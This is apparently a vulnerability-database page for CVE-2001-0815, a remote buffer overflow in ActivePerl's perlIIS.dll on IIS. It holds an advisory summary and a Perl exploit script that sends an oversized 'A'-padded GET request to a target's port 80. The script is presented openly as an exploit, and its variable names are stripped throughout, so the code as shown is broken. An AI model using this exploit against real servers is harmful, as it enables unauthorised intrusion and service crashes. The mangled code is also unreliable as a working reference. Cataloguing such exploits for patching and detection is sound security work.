ActivePerl 5.6.1 - 'perlIIS.dll' Remote Buffer Overflow (3)
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2001-0815 | 9 Mar 200205:00 | – | cve | |
| CVE-2001-0815 | 9 Mar 200205:00 | – | cvelist | |
| ActivePerl 5.6.1 - 'perlIIS.dll' Remote Buffer Overflow (1) | 15 Nov 200100:00 | – | exploitdb | |
| ActivePerl 5.6.1 - 'perlIIS.dll' Remote Buffer Overflow (2) | 15 Nov 200100:00 | – | exploitdb | |
| CVE-2001-0815 | 6 Dec 200105:00 | – | nvd | |
| ActivePerl perlIS.dll Buffer Overflow | 3 Nov 200500:00 | – | openvas | |
| ActivePerl perlIS.dll Buffer Overflow Vulnerability - Active Check | 3 Nov 200500:00 | – | openvas | |
| ActivePerl perlIS.dll Remote Buffer Overflow | 26 Nov 200100:00 | – | nessus | |
| NSFOCUS SA2001-07 : ActivePerl PerlIS.dll Remote Buffer Overflow Vulnerability | 15 Nov 200100:00 | – | securityvulns |
source: https://www.securityfocus.com/bid/3526/info
ActivePerl is an implementation of the Perl scripting language for Microsoft Windows systems developed by Activestate. ActivePerl allows for high-performance integration with IIS using a DLL called 'perlIIS.dll' to handle a '.plx' ISAPI extension.
perlIIS.dll contains a remotely exploitable buffer overflow vulnerability in handling of the URL string. It is due to an unbounded string copy operation.
All versions of ActivePerl prior to build 630 of ActivePerl 5.6.1 are believed to be vulnerable. This vulnerability requires that the option "Check that file exists" be disabled. This option is enabled by default.
Exploitation of this vulnerability may allow for remote attackers to gain access to the target server.
#!/usr/bin/perl -w
use IO::Socket;
= "ActivePerl 5.6.1.629";
unless (@ARGV == 1) {
print "\n Exploit by Sapient2003\n";
die "usage: -bash <host to exploit>\n";
}
print "\n Exploit by Sapient2003\n";
= "A" x 360;
= "GET /.pl HTTP/1.0\n\n";
= IO::Socket::INET->new(
PeerAddr => [0],
PeerPort => 80,
Proto => "tcp",
) or die "Can't find host [0]\n";
print ;
print "Attempted to exploit [0]...\n";
close();Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Sep 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.14423